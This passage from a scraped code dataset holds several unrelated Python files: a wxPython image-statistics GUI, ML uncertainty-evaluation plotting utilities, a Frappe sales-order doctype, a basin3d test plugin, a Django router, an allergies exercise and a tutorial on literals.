decimals=4)))\n\t\t\tself.avgDisplayB.Clear()\n\t\t\tself.avgDisplayB.AppendText(str(numpy.around(numpy.mean(self.bmat), decimals=4)))\n\t\t\tself.avgDisplayGb.Clear()\n\t\t\tself.avgDisplayGb.AppendText(str(numpy.around(numpy.mean(self.gbmat), decimals=4)))\n\t\t\tself.avgDisplayGr.Clear()\n\t\t\tself.avgDisplayGr.AppendText(str(numpy.around(numpy.mean(self.grmat), decimals=4)))\n\t\t\tself.avgDisplayR.Clear()\n\t\t\tself.avgDisplayR.AppendText(str(numpy.around(numpy.mean(self.rmat), decimals=4)))\n\n\t\t\t# calculate and display std\n\t\t\tself.stdDisplay.Clear()\n\t\t\tself.stdDisplay.AppendText(str(numpy.around(numpy.std(self.mat), decimals=4)))\n\t\t\tself.stdDisplayB.Clear()\n\t\t\tself.stdDisplayB.AppendText(str(numpy.around(numpy.std(self.bmat), decimals=4)))\n\t\t\tself.stdDisplayGb.Clear()\n\t\t\tself.stdDisplayGb.AppendText(str(numpy.around(numpy.std(self.gbmat), decimals=4)))\n\t\t\tself.stdDisplayGr.Clear()\n\t\t\tself.stdDisplayGr.AppendText(str(numpy.around(numpy.std(self.grmat), decimals=4)))\n\t\t\tself.stdDisplayR.Clear()\n\t\t\tself.stdDisplayR.AppendText(str(numpy.around(numpy.std(self.rmat), decimals=4)))\n\n\t\t\t# update status\n\t\t\tself.statusText.SetValue(\"Done.\")\n\t\t\tself.statusText.SetForegroundColour(wx.BLACK)\n\t\texcept IOError:\n\t\t\t# throw error\n\t\t\tself.statusText.SetValue(\"Error: cannot read file.\")\n\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\n\t# function for displaying\n\tdef Display(self, 
event):\n\t\ttry:\n\t\t\t# update status\n\t\t\tself.statusText.SetValue(\"Processing...\")\n\t\t\tself.statusText.SetForegroundColour(wx.BLACK)\n\t\t\t# try reading the file\n\t\t\tself.im = Image.open(self.fileDisplay.GetValue())\n\t\t\t# display image\n\t\t\tself.im.show()\n\t\t\t# update status\n\t\t\tself.statusText.SetValue(\"Done.\")\n\t\t\tself.statusText.SetForegroundColour(wx.BLACK)\n\t\texcept IOError:\n\t\t\t# throw error\n\t\t\tself.statusText.SetValue(\"Error: cannot read file.\")\n\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\n\n# end class \n# ============================================================================================\n\n# below is needed for all GUIs\nif __name__== '__main__':\n\tapp = wx.App(False) # application object (inner workings) PySimpleApp\n\tframe = imageStat(parent = None) # frame object (what user sees)\n\tframe.Show() # show frame\n\tapp.MainLoop() # run main loop\t\n\n","repo_name":"OneRaynyDay/Internship-Project","sub_path":"imageStat.py","file_name":"imageStat.py","file_ext":"py","file_size_in_byte":9775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31204074405","text":"import torch\nimport csv\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LogisticRegressionCV\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn import metrics\nfrom scipy.stats import entropy\n\ndef plot_histograms(id_confidences, data, model, seed, id=None, corrects=None, ood_confidences=None):\n print(\"Calculating histogram metrics...\")\n # plot and save histogram\n fig = plt.figure(figsize = (20, 10))\n plt.style.use('seaborn-v0_8')\n plt.rcParams['font.size'] = '20'\n\n if corrects is not None:\n id_array = id_confidences[corrects]\n ood_array = id_confidences[np.invert(corrects)]\n id_label = \"Correct\"\n ood_label = \"Incorrect\"\n hist_path = \"histograms/corr/\"+data+\"_\"+model\n filename = '/LC_CORR_'+model+'_'+data+'_seed'+str(seed)+'.png'\n elif ood_confidences is not None:\n id_array = id_confidences\n ood_array = ood_confidences\n id_label = \"ID\"\n ood_label = \"OOD\"\n hist_path = \"histograms/ood/\"+data+\"_\"+model\n filename = '/LC_OOD_'+model+'_'+data+'_seed'+str(seed)+'_id'+str(id)+'.png'\n\n div_size = min(len(id_array), len(ood_array))\n if div_size == 0:\n id_array = np.append(id_array, 1.0)\n ood_array = np.append(ood_array, 0.0)\n kl_div = entropy(pk=id_array[:div_size], qk=ood_array[:div_size])\n bins = np.linspace(min(np.min(id_array), np.min(ood_array)), max(np.max(id_array), np.max(ood_array)), 200)\n \n ax1 = plt.subplot(1, 2, 1)\n # Set tick font size\n for label in (ax1.get_xticklabels() + ax1.get_yticklabels()):\n label.set_fontsize(20)\n ax1.hist([id_array, ood_array], bins, label=[id_label, ood_label], histtype='barstacked', density=True)\n ax1.legend(loc='upper right', frameon=False, prop={'size': 20})\n ax1.set_xlabel('Confidence', fontsize=20)\n ax1.set_ylabel('Density', fontsize=20)\n\n ax2 = plt.subplot(1, 2, 2)\n # Set tick font size\n for label in (ax2.get_xticklabels() + ax2.get_yticklabels()):\n label.set_fontsize(20)\n counts1, bins1 = np.histogram(id_array, bins, density=True)\n ax2.plot(bins1[:-1], counts1, label=id_label, color = 'tab:blue', linestyle=\"-\")\n counts2, bins2 = np.histogram(ood_array, bins, density=True)\n ax2.plot(bins2[:-1], counts2, label=ood_label, color = 'tab:green', linestyle=\"-\")\n lim = max(max(counts1), 
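The per-channel statistics in the wx GUI's Calculate() come down to parity slicing of the mosaic; the same numbers take a few NumPy lines (the layout matches the GUI's B/Gb/Gr/R naming, i.e. BGGR):

```python
import numpy as np

# Channel statistics for a Bayer mosaic by row/column parity, mirroring the
# slicing in imageStat.
mosaic = np.random.default_rng(0).integers(0, 256, size=(200, 200))
channels = {
    'B':  mosaic[0::2, 0::2],
    'Gb': mosaic[0::2, 1::2],
    'Gr': mosaic[1::2, 0::2],
    'R':  mosaic[1::2, 1::2],
}
for name, ch in channels.items():
    print(f'{name}: mean={ch.mean():.2f} std={ch.std():.2f}')
```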
max(counts2))\n if np.isnan(lim) or np.isinf(lim):\n lim = 50\n ax2.set_ylim([0, lim])\n ax2.legend(frameon=False, prop={'size': 20})\n ax2.set_xlabel('Confidence', fontsize=20)\n ax2.set_ylabel('Density', fontsize=20)\n\n # save figure\n if not os.path.exists(hist_path):\n os.makedirs(hist_path)\n titlename = 'Learned Confidences - ' + data +' - Model Seed: '+str(seed)+' , KL-div: '+str(round(kl_div, 2))\n filename = hist_path + filename\n fig.suptitle(titlename, fontsize=25)\n plt.savefig(filename)\n plt.clf()\n plt.close()\n return kl_div\n\ndef plot_roc(tpr, fpr, model, data, auroc, UA_values, seed, id):\n # identify best Uncertainty-balanced accuracy and corr. threshold\n best_thresh = UA_values[0,np.argmax(UA_values[1,:])]\n best_ua = np.max(UA_values[1,:])\n # plot and save roc curces\n plt.style.use('seaborn-v0_8')\n plt.plot(fpr, tpr)\n plt.xlabel('False Positive Rate') #, fontsize=20\n #plt.xticks(fontsize=20)\n plt.ylabel('True Positive Rate') #, fontsize=20\n #plt.yticks(fontsize=20)\n roc_path = \"ROC_curves/\"+data+\"_\"+model\n if not os.path.exists(roc_path):\n os.makedirs(roc_path)\n\n titlename = 'ROC-curve Learning Confidence - '+data+' - AUROC: '+str(round(auroc, 4)) \\\n +' - UAcc: '+str(round(best_ua, 2)) +' - Thresh: '+str(round(best_thresh, 2))\n filename = roc_path+'/LC_roc_'+model+'_'+data+'_seed'+str(seed)+'_id'+str(id)+'.png'\n\n plt.title(titlename) #, fontsize=25\n plt.savefig(filename)\n plt.clf()\n\ndef calc_OODmetrics(id_array, ood_array):\n print(\"Calculating OOD detection metrics...\")\n # turn measure arrays into train/test data for Log.Reg\n values = np.concatenate((id_array, ood_array))\n labels = np.concatenate((np.zeros_like(id_array), np.ones_like(ood_array)))\n indices = np.random.permutation(values.shape[0])\n ratio = int(len(indices)*0.4)\n training_idx, test_idx = indices[ratio:], indices[:ratio]\n X_train, X_test = values[training_idx], values[test_idx]\n y_train, y_test = labels[training_idx], labels[test_idx]\n print(\"# instances for binary classifier: \")\n print(\"Train images: \", X_train.shape, \"\\tTest images: \", X_test.shape)\n print(\"Train labels: \", y_train.shape, \"\\tTest labels: \", y_test.shape)\n\n # perform linear regression on ID and OOD samples\n pipe = make_pipeline(StandardScaler(), LogisticRegressionCV(n_jobs=-1))\n lr = pipe.fit(X_train.reshape(-1, 1), y_train)\n y_pred = lr.predict_proba(X_test.reshape(-1, 1))[:, 1] # = probability of being OOD\n fpr, tpr, thresholds = metrics.roc_curve(y_test, y_pred) # implementation from sklearn library\n auroc = metrics.roc_auc_score(y_test, y_pred) # implementation from sklearn library\n UA_values = calc_UncBalAccuracy(y_test, y_pred, thresholds)\n\n return tpr, fpr, thresholds, auroc, UA_values\n\ndef calc_UncBalAccuracy(y_true, y_pred, thresholds):\n # calculate Uncertainty-balanced Accuracy for several thresholds\n uaccuracies = np.zeros_like(thresholds, dtype=float)\n for i, threshold in enumerate(thresholds):\n pred_labels = np.zeros_like(y_pred, dtype=int)\n pred_labels[np.where(y_pred >= threshold)] = 1\n tn, fp, fn, tp = metrics.confusion_matrix(y_true, pred_labels).ravel()\n unc_acc = (tp + tn)/(tp + tn + fp + fn)\n uaccuracies[i] = unc_acc\n UA_values = np.row_stack((thresholds, uaccuracies))\n return UA_values\n\ndef plot_calibration_diagram(confidences, predictions, all_labels, num_bins, model, seed, id, data):\n print(\"Calculating calibration metrics...\")\n # plot reliability diagram\n # code adapted from: 
https://github.com/hollance/reliability-diagrams/blob/master/reliability_diagrams.py\n    bin_size = 1.0 / num_bins\n    bins = np.linspace(0.0, 1.0, num_bins + 1)\n    indices = np.digitize(confidences, bins, right=True)\n\n    bin_accuracies = np.zeros(num_bins, dtype=float)\n    bin_confidences = np.zeros(num_bins, dtype=float)\n    bin_counts = np.zeros(num_bins, dtype=int)\n\n    print(\"LABELS: \", all_labels)\n    print(\"PREDS: \", predictions)\n    \n    for b in range(num_bins):\n        selected = np.where(indices == b + 1)[0]\n        if len(selected) > 0:\n            bin_accuracies[b] = np.mean(all_labels[selected] == predictions[selected])\n            bin_confidences[b] = np.mean(confidences[selected])\n            bin_counts[b] = len(selected)\n\n    # eliminate cases where there are no confidence values in a selected bin (bin_confidences[b] = 0)\n    non_zero = np.where(bin_confidences != 0)[0]\n    if len(non_zero) == 0 or non_zero[0] != 0: # prepend index 0 only when it is not already the first entry, so it is never duplicated\n        non_zero = np.append(np.array([0]), non_zero)\n    bin_accuracies = bin_accuracies[non_zero]\n    bin_confidences = bin_confidences[non_zero]\n    \n    if len(non_zero) != num_bins:\n        print(\"Deleted entries in bin_confidences: \", num_bins-len(non_zero))\n    print(\"Bin Accuracies: \", bin_accuracies)\n    print(\"Bin Confidences: \", bin_confidences)\n    print(\"Bin Counts before: \", bin_counts)\n    bin_counts = bin_counts[non_zero]\n    print(\"Bin Counts after: \", bin_counts)\n    avg_acc = np.sum(bin_accuracies * bin_counts) / np.sum(bin_counts)\n    avg_conf = np.sum(bin_confidences * bin_counts) / np.sum(bin_counts)\n\n    gaps = np.abs(bin_accuracies - bin_confidences)\n    ece = np.sum(gaps * bin_counts) / np.sum(bin_counts)\n\n    plt.style.use('seaborn-v0_8')\n    plt.plot(bin_confidences, bin_accuracies, label='Learning Confidence', color = 'tab:blue', linestyle=\"-\")\n    plt.plot([0.0, 1.0], [0.0, 1.0], label='Ideal', color = 'tab:gray', linestyle=\"--\")\n    plt.xlabel('Confidence')\n    plt.ylabel('Accuracy')\n    plt.legend(loc=0)\n\n    cal_path = \"CAL_curves/\"+data+\"_\"+model\n    if not os.path.exists(cal_path):\n        os.makedirs(cal_path)\n\n    titlename = 'Calibration Learning Confidence - '+data+' - ECE: '+str(round(ece, 2))\\\n        +' - Avg-Acc: '+str(round(avg_acc, 2))+' - Avg-Conf: '+str(round(avg_conf, 2))\n    filename = cal_path+'/LC_cal_'+model+'_'+data+'_seed'+str(seed)+'_id'+str(id)+'.png'\n\n    plt.title(titlename)\n    plt.savefig(filename)\n    plt.clf()\n    return bin_confidences, bin_accuracies, ece\n\ndef calc_rejection_curve(all_labels, predictions, id_array, ood_array, device, all_images, all_ood_images):\n    print(\"Calculating ACR curve metrics...\")\n    accuracies = np.ones(11)\n    ideal = np.ones(11)\n    fractions = np.linspace(0.0, 1.0, 11)\n\n    predictions = torch.from_numpy(predictions).to(device)\n    id_array = torch.from_numpy(id_array).squeeze().to(device)\n    ood_array = torch.from_numpy(ood_array).squeeze().to(device)\n\n    # combine arrays conveniently\n    corrects = predictions.eq(all_labels).float() # cast to float so it can be concatenated with the float zeros below\n    oods = torch.zeros(len(ood_array), device=device)\n    corrects = torch.cat((corrects, oods), dim=0) # combined correctness indicators with all ood samples set to false (0)\n    uncertainties = torch.cat((id_array, ood_array), dim=0) # combined uncertainty (confidence) array\n    images = torch.cat((all_images, all_ood_images), dim=0) # combined id/ood-images tensor\n    all_ood_labels = torch.full((1, all_ood_images.size(0)), fill_value=-1)\n    all_ood_labels = all_ood_labels.squeeze().to(device)\n    labels = torch.cat((all_labels, all_ood_labels))\n\n    accuracies[0] = corrects.sum() / corrects.size(0)\n    num_discard 
= int(0.1*uncertainties.size(0))\n\n # sort array according to entropy\n sorted_unc, indices = torch.sort(uncertainties, dim=0, descending=True)\n sorted_cor = corrects.clone().scatter_(0, indices, corrects)\n filtered_imgs = images[indices[:]] # insert [:10] here to only take fraction (10 most uncertain)\n filtered_uncs = uncertainties[indices[:]] # the corresponding uncertainty values (10 highest with [:10])\n filtered_lbls = labels[indices[:]]\n\n # calculate values for theoretical maximum\n ideal[0] = id_array.size(0) / (ood_array.size(0) + id_array.size(0))\n\n # iteratively throw out predictions 10% of the most uncertain data + recalculate accuracy\n for i in range(1, 11):\n sorted_cor = sorted_cor[num_discard:]\n oods_left = ood_array.size(0)-num_discard*i\n if oods_left >= 0:\n # ideal: only ood's discarded, all ID's retained with high certainty \n # -> ideal = fraction of id samples\n ideal[i] = id_array.size(0) / (oods_left + id_array.size(0))\n if sorted_cor.size(0) > 0:\n accuracies[i] = sorted_cor.sum() / sorted_cor.size(0)\n return fractions, accuracies, ideal, filtered_imgs, filtered_uncs, filtered_lbls\n\ndef plot_accrej_curve(fractions, accuracies, ideal, model, data, seed, id):\n # plot and save accuracy-rejection curve\n plt.style.use('seaborn-v0_8')\n plt.plot(fractions, accuracies, label='Learning Confidence', color = 'tab:orange', linestyle=\"-\")\n plt.plot(fractions, ideal, label='Theoretical Maximum', color = 'tab:gray', linestyle=\"-\")\n plt.xlabel('% of data rejected by uncertainty') #, fontsize=20\n plt.xticks() #fontsize=20\n plt.ylabel('Accuracy') #, fontsize=20\n plt.legend(loc=0)\n plt.yticks() #fontsize=20\n accrej_path = \"ACCREJ_curves/\"+data+\"_\"+model\n if not os.path.exists(accrej_path):\n os.makedirs(accrej_path)\n\n titlename = 'Acc-Rej-curve Learning Confidence - ' + data\n filename = accrej_path+'/LC_accrej_'+model+'_'+data+'_seed'+str(seed)+'_id'+str(id)+'.png'\n\n plt.title(titlename) #, fontsize=25\n plt.savefig(filename)\n plt.clf()\n\n#---------------------------------------------------------------------------\n\ndef encode_onehot(labels, n_classes, device):\n onehot = torch.FloatTensor(labels.size()[0], n_classes)\n labels = labels.data\n if labels.is_cuda:\n onehot = onehot.to(device)\n onehot.zero_()\n onehot.scatter_(1, labels.view(-1, 1), 1)\n return onehot\n\nclass CSVLogger():\n def __init__(self, args, filename='log.csv', fieldnames=['epoch']):\n\n self.filename = filename\n self.csv_file = open(filename, 'w')\n\n # Write model configuration at top of csv\n writer = csv.writer(self.csv_file)\n for arg in vars(args):\n writer.writerow([arg, getattr(args, arg)])\n writer.writerow([''])\n\n self.writer = csv.DictWriter(self.csv_file, fieldnames=fieldnames)\n self.writer.writeheader()\n\n self.csv_file.flush()\n\n def writerow(self, row):\n self.writer.writerow(row)\n self.csv_file.flush()\n\n def close(self):\n self.csv_file.close()\n","repo_name":"theresabruns/UncertaintyEstimation","sub_path":"LearningConfidence/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7127393498","text":"import frappe\nfrom frappe.model.document import Document\n\n\nclass CustomerPO(Document):\n\n\t@frappe.whitelist()\n\tdef create_sales_order(self):\n\t\tso_doc = frappe.new_doc(\"Sales Order\")\n\t\tso_doc.customer = self.customer\n\t\tso_doc.transaction_date = self.date\n\t\tso_doc.delivery_date = 
self.delivery_date\n\t\tfor item in self.items:\n\t\t\tso_doc.append(\"items\", {\n\t\t\t\t\"item_code\": item.item_code,\n\t\t\t\t\"item_name\": frappe.db.get_value(\"Item\", item.item_code, \"item_name\"),\n\t\t\t\t\"description\": item.description,\n\t\t\t\t\"qty\": item.qty,\n\t\t\t\t\"uom\": item.uom,\n\t\t\t\t\"rate\": item.rate,\n\t\t\t\t\"amount\": item.amount\n\t\t\t})\n\t\t\t\n\t\tso_doc.save()\n\t\tso_doc.against_customer_po = self.name\n\t\tso_doc.submit()\n\n\t\tsales_order = frappe.db.set_value(self.doctype, self.name, \"sales_order\", so_doc.name)\n\n\t\treturn {\"doc_name\":so_doc.name}","repo_name":"Lewinta/hampden","sub_path":"hampden/hampden/doctype/customer_po/customer_po.py","file_name":"customer_po.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27030994075","text":"import logging\nfrom typing import Any, List\n\nfrom basin3d.core.models import AbsoluteCoordinate, AltitudeCoordinate, Coordinate, DepthCoordinate, \\\n GeographicCoordinate, MeasurementTimeseriesTVPObservation, MonitoringFeature, RelatedSamplingFeature, \\\n RepresentativeCoordinate, SpatialSamplingShapes, VerticalCoordinate, ResultListTVP\nfrom basin3d.core.plugin import DataSourcePluginPoint, basin3d_plugin, DataSourcePluginAccess\nfrom basin3d.core.schema.enum import FeatureTypeEnum, TimeFrequencyEnum\nfrom basin3d.core.schema.query import QueryMonitoringFeature, QueryMeasurementTimeseriesTVP\n\nlogger = logging.getLogger(__name__)\n\n\nclass AlphaMeasurementTimeseriesTVPObservationAccess(DataSourcePluginAccess):\n \"\"\"\n MeasurementTimeseriesTVPObservation Access class\n \"\"\"\n synthesis_model_class = MeasurementTimeseriesTVPObservation\n\n def list(self, query: QueryMeasurementTimeseriesTVP):\n \"\"\"\n Generate a list of MeasurementTimeseriesTVPObservation objects\n \"\"\"\n synthesis_messages: List[str] = []\n data: List[Any] = []\n quality: List[Any] = []\n\n # query = kwargs.get('query')\n # assert query\n\n if query.monitoring_feature == ['region']:\n return StopIteration({\"message\": \"FOO\"})\n\n supported_monitoring_features = [f'{num}' for num in range(1, 5)]\n\n if not any([loc_id in supported_monitoring_features for loc_id in query.monitoring_feature]):\n return StopIteration({\"message\": \"No data from data source matches monitoring features specified.\"})\n\n location_indices = []\n for loc_id in query.monitoring_feature:\n if loc_id in supported_monitoring_features:\n location_indices.append(int(loc_id.split('-')[-1]))\n\n from datetime import datetime\n for num in range(1, 10):\n data.append((datetime(2016, 2, num), num * 0.3454))\n data = [data, data, [], data]\n rqe1 = 'VALIDATED'\n rqe2 = 'UNVALIDATED'\n rqe3 = 'REJECTED'\n quality = [[rqe1, rqe1, rqe1, rqe1, rqe1, rqe1, rqe1, rqe1, rqe1],\n [rqe2, rqe2, rqe2, rqe2, rqe2, rqe2, rqe2, rqe3, rqe3],\n [],\n [rqe1, rqe2, rqe3, rqe1, rqe1, rqe1, rqe1, rqe1, rqe1]]\n qualities = [[rqe1],\n [rqe2, rqe3],\n [],\n [rqe1, rqe2, rqe3]]\n observed_property_variables = [\"Acetate\", \"Acetate\", \"Aluminum\", \"Al\"]\n units = ['nm', 'nm', 'mg/L', 'mg/L']\n statistics = ['mean', 'max', 'mean', 'max']\n\n for num in location_indices:\n observed_property_variable = observed_property_variables[num - 1]\n feature_id = f'A-{str(num - 1)}'\n if query:\n if observed_property_variable not in query.observed_property:\n continue\n if query.statistic:\n if statistics[num - 1] not in query.statistic:\n continue\n result_value = data[num - 1]\n 
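# per-timestamp quality flags; kept parallel to result_value so the zip() filtering below stays aligned\n            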
result_value_quality = quality[num - 1]\n result_qualities = qualities[num - 1]\n if query.result_quality:\n filtered_value = []\n filtered_quality = []\n has_filtered_data_points = 0\n\n for v, q in zip(result_value, result_value_quality):\n if q in query.result_quality:\n filtered_value.append(v)\n filtered_quality.append(q)\n else:\n has_filtered_data_points += 1\n\n if has_filtered_data_points > 0:\n synthesis_messages.append(f'{feature_id} - {observed_property_variable}: {str(has_filtered_data_points)} timestamps did not match data quality query.')\n\n if len(filtered_value) == 0:\n synthesis_messages.append(f'{feature_id} - {observed_property_variable}: No data values matched result_quality query.')\n print(f'{feature_id} - {observed_property_variable}')\n continue\n\n result_value = filtered_value\n result_value_quality = filtered_quality\n if len(result_value_quality) > 0:\n result_qualities = list(set(result_value_quality))\n else:\n result_qualities = []\n\n yield MeasurementTimeseriesTVPObservation(\n plugin_access=self,\n id=num,\n observed_property=observed_property_variable,\n utc_offset=-8 - num,\n feature_of_interest=MonitoringFeature(\n plugin_access=self,\n id=num,\n name=\"Point Location \" + str(num),\n description=\"The point.\",\n feature_type=FeatureTypeEnum.POINT,\n shape=SpatialSamplingShapes.SHAPE_POINT,\n coordinates=Coordinate(\n absolute=AbsoluteCoordinate(\n horizontal_position=GeographicCoordinate(\n units=GeographicCoordinate.UNITS_DEC_DEGREES,\n latitude=70.4657, longitude=-20.4567),\n vertical_extent=AltitudeCoordinate(\n datum=AltitudeCoordinate.DATUM_NAVD88,\n value=1500,\n distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),\n representative=RepresentativeCoordinate(\n vertical_position=DepthCoordinate(\n datum=DepthCoordinate.DATUM_LOCAL_SURFACE,\n value=-0.5 - num * 0.1,\n distance_units=VerticalCoordinate.DISTANCE_UNITS_METERS)\n )\n ),\n observed_properties=[\"Ag\", \"Acetate\", \"Aluminum\", \"Al\"],\n related_sampling_feature_complex=[\n RelatedSamplingFeature(\n plugin_access=self,\n related_sampling_feature=\"Region1\",\n related_sampling_feature_type=FeatureTypeEnum.REGION,\n role=RelatedSamplingFeature.ROLE_PARENT)]\n ),\n feature_of_interest_type=FeatureTypeEnum.POINT,\n unit_of_measurement=units[num - 1],\n aggregation_duration=TimeFrequencyEnum.DAY,\n result_quality=result_qualities,\n time_reference_position=None,\n statistic=statistics[num - 1],\n result=ResultListTVP(\n plugin_access=self,\n value=result_value, result_quality=result_value_quality)\n )\n\n return StopIteration(synthesis_messages)\n\n\nclass AlphaMonitoringFeatureAccess(DataSourcePluginAccess):\n \"\"\"\n MonitoringFeature access class\n \"\"\"\n synthesis_model_class = MonitoringFeature\n\n def list(self, query: QueryMonitoringFeature):\n \"\"\"\n Generate list of MonitoringFeature objects\n \"\"\"\n\n feature_type = query.feature_type\n monitoring_feature_list = query.monitoring_feature\n\n obj_region = MonitoringFeature(\n plugin_access=self,\n id=\"Region1\",\n name=\"AwesomeRegion\",\n description=\"This region is really awesome.\",\n feature_type=FeatureTypeEnum.REGION,\n shape=SpatialSamplingShapes.SHAPE_SURFACE,\n coordinates=Coordinate(representative=RepresentativeCoordinate(\n representative_point=AbsoluteCoordinate(\n horizontal_position=GeographicCoordinate(\n units=GeographicCoordinate.UNITS_DEC_DEGREES,\n latitude=70.4657, longitude=-20.4567),\n vertical_extent=AltitudeCoordinate(\n datum=AltitudeCoordinate.DATUM_NAVD88,\n value=1500,\n 
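# the 1500 above is an elevation in feet, per distance_units on the next argument\n                            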
distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),\n representative_point_type=RepresentativeCoordinate.REPRESENTATIVE_POINT_TYPE_CENTER_LOCAL_SURFACE)\n )\n )\n\n if monitoring_feature_list and 'Region1' in monitoring_feature_list:\n if feature_type == FeatureTypeEnum.REGION:\n yield obj_region\n elif feature_type == FeatureTypeEnum.REGION:\n yield obj_region\n\n obj_point = MonitoringFeature(\n plugin_access=self,\n id=\"1\",\n name=\"Point Location 1\",\n description=\"The first point.\",\n feature_type=FeatureTypeEnum.POINT,\n shape=SpatialSamplingShapes.SHAPE_POINT,\n coordinates=Coordinate(\n absolute=AbsoluteCoordinate(\n horizontal_position=GeographicCoordinate(\n units=GeographicCoordinate.UNITS_DEC_DEGREES,\n latitude=70.4657, longitude=-20.4567),\n vertical_extent=AltitudeCoordinate(\n datum=AltitudeCoordinate.DATUM_NAVD88,\n value=1500,\n distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),\n representative=RepresentativeCoordinate(\n vertical_position=DepthCoordinate(\n datum=DepthCoordinate.DATUM_LOCAL_SURFACE,\n value=-0.5,\n distance_units=VerticalCoordinate.DISTANCE_UNITS_METERS)\n )\n ),\n observed_properties=[\"Ag\", \"Acetate\"],\n related_sampling_feature_complex=[\n RelatedSamplingFeature(\n plugin_access=self,\n related_sampling_feature=\"Region1\",\n related_sampling_feature_type=FeatureTypeEnum.REGION,\n role=RelatedSamplingFeature.ROLE_PARENT)]\n )\n\n if monitoring_feature_list and '1' in monitoring_feature_list:\n if feature_type == FeatureTypeEnum.POINT:\n yield obj_point\n elif feature_type == FeatureTypeEnum.POINT:\n yield obj_point\n\n def get(self, query: QueryMonitoringFeature):\n\n \"\"\"\n Get a Monitoring Feature objects\n \"\"\"\n # query.id will always be a string at this point with validation upstream, thus ignoring the type checking\n prefixed_monitoring_feature = f'{self.datasource.id_prefix}-{query.id}' # type: ignore[list-item]\n\n query.monitoring_feature = [query.id] # type: ignore[list-item]\n\n for s in self.list(query):\n if s.id == prefixed_monitoring_feature:\n return s\n return None\n\n\n@basin3d_plugin\nclass AlphaDataSourcePlugin(DataSourcePluginPoint):\n title = 'Alpha Data Source Plugin'\n plugin_access_classes = (AlphaMeasurementTimeseriesTVPObservationAccess, AlphaMonitoringFeatureAccess)\n\n feature_types = ['REGION', 'POINT', 'TREE', 'HORIZONTAL_PATH']\n\n class DataSourceMeta:\n \"\"\"\n This is an internal metadata class for defining DataSource attributes.\n \"\"\"\n # Data Source attributes\n location = 'https://asource.foo/'\n id = 'Alpha' # unique id for the datasource\n id_prefix = 'A'\n name = id # Human Friendly Data Source Name\n","repo_name":"BASIN-3D/django-basin3d","sub_path":"example-django/mybroker/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":11574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28176452436","text":"# -*- coding: utf-8 -*-\n\nfrom rest_framework import routers\nfrom tutor.api.views import EngageViewSet, GradeViewSet, ChoiceTeacherViewSet\n\nrouter = routers.SimpleRouter()\n\nrouter.register(r'engage', EngageViewSet, base_name='engage')\nrouter.register(r'grade', GradeViewSet, base_name='grade')\nrouter.register(r'choiceteacher', ChoiceTeacherViewSet, base_name='choiceteacher')\n\nurlpatterns = 
router.urls\n","repo_name":"15810111831/xieyiyuan","sub_path":"education/tutor/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40686835439","text":"__author__ = 'banarasitippa'\n\ndef toStr(n,base):\n convertString = \"0123456789ABCDEF\"\n if n < base:\n return convertString[n]\n else:\n return toStr(n//base,base) + convertString[n%base]\n\n\nclass Allergies:\n\n def __init__(self,alergy_count):\n self.alergy_count = alergy_count\n self.list = self.findAlergies()\n\n def findAlergies(self):\n alergies = ('eggs peanuts shellfish strawberries tomatoes '\n 'chocolate pollen cats').split()\n base_2_num = toStr(self.alergy_count,2)\n ls =[]\n p = 0\n for x in base_2_num[::-1]:\n if x ==\"1\" and p < 8:\n ls.append(alergies[p])\n p += 1\n# print ls\n return ls\n\n def is_allergic_to(self,item):\n return item in self.list\n\n#print Allergies(5)\n#print (toStr(1,2))\n#allergies = Allergies(3)\n#print (allergies.is_allergic_to('eggs'))\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/allergies/1ecc7a34ec69441a9ae41383da23c691.py","file_name":"1ecc7a34ec69441a9ae41383da23c691.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"40206525175","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport constant\n\ndef example_001():\n\ta = 1 + 2 + 3 + \\\n\t\t4 + 5 + 6 + \\\n\t\t7 + 8 + 9\n\treturn a\n\ndef example_002():\n\ta = (1* 2 * 3 *\n\t\t4 * 5 * 6 *\n\t\t7 * 8 * 9\n\t\t)\n\treturn a\n\ndef example_003():\n\ta, b, c = 1, 2, 3\n\tx = 1; y = 2; z = 3;\n\treturn a + b + c + x * y * z\n\ndef example_004():\n\tcolors = [\n\t\t'red', 'green', 'blue',\n\t\t'gray', 'orange', 'pink'\n\t]\n\treturn colors\n\ndef example_005():\n\tfor i in range(1,10):\n\t\tprint(i)\n\t\tif i == 5:\n\t\t\tbreak\n\ndef example_006():\n\tprint(constant.PI)\n\tprint(constant.GRAVITY)\n\ndef example_007():\n\ta = 0b01\n\tb = 100\n\tc = 0o10\n\td = 0x0A #Hexadecimal Literal\n\t# FLOAT Literals\n\tf_001 = 10.5\n\tf_002 = 1.5e2\n\tf_003 = 1.5 * 100\n\t# COMPLEX\n\t#Complex Literal \n\tx = 1+3.14j\n\tprint(a,b,c,d,f_001,f_002,f_003,x,x.real, x.imag)\n\t# String literals\n\ta_str = \"simple string\\n\"\n\tchar = \"C\\n\"\n\tlines = \"\"\"\n\tLine 1 \\n\n\tLine 2 \\n\n\tLine 3 \\n\n\t\"\"\"\n\tunicode = u\"\\u00dcnic\\u00f6de\"\n\traw_str = r\"raw \\n 